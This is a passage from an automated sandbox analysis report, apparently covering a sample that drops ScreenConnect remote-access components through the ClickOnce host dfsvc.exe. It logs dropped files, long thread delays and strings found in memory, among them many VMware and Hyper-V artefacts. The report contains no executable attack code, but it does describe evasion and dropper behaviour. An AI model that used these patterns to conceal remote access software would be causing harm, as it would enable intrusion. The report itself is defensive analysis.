                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592015Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 3309Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeWindow / User API: threadDelayed 6300Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\RV7HOO4L.7TM\1O7BWTAO.H01\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exe TID: 2376Thread sleep time: -40000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -599612s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -599478s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -599370s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -599204s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -599030s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -598079s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597938s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597829s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597688s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597563s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597453s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597343s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597225s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -597000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -596890s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -596782s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -596672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -596535s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -596407s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -596282s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -596157s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -596047s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -595937s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -595788s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -595671s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -595476s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -595360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -595235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -595110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -594985s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -594860s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -594735s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -594610s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -594485s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -594360s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -594235s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -594110s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -593985s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -593844s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -593721s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -593594s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -593484s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -593375s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -593265s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -593130s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592986s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592860s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592672s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592558s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592449s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592344s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592229s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592119s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6248Thread sleep time: -592015s >= -30000sJump to behavior
                  Source: C:\Windows\System32\svchost.exe TID: 2788Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 4980Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 2052Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 5976Thread sleep count: 188 > 30
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 3008Thread sleep count: 108 > 30
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe TID: 3276Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe TID: 5508Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeCode function: 0_2_00B64A4B FindFirstFileExA,0_2_00B64A4B
                  Source: C:\Users\user\Desktop\khwHsyfsJ1.exeThread delayed: delay time: 40000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599612Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599478Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599370Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599204Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599030Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598079Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597829Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597563Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597225Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596890Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596782Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596535Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596407Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596282Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596157Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596047Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595937Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595788Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595671Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595476Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593844Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593721Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593594Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593484Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593375Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593265Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 593130Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592986Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592860Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592672Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592558Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592449Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592229Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592119Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 592015Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\AppData\Local\Apps\2.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q0B52QGM.675\BV2JH5RM.NCD\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeFile opened: C:\Users\user\Jump to behavior
                  Source: Amcache.hve.6.drBinary or memory string: VMware
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                  Source: svchost.exe, 00000008.00000003.1505465041.00000189C6432000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: NXTAAAAVMWare
                  Source: svchost.exe, 00000007.00000002.2689284980.000001E0E722B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                  Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.6.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: dfsvc.exe, 00000002.00000002.2494631390.000001D45927F000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2490569450.000001D457230000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2690912629.000001E0EC85A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2688956884.00000189C562B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2689297408.00000189C56D3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: vmci.sys
                  Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.6.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Amcache.hve.6.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
                  Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.6.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware VMCI Bus Device
                  Source: Amcache.hve.6.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
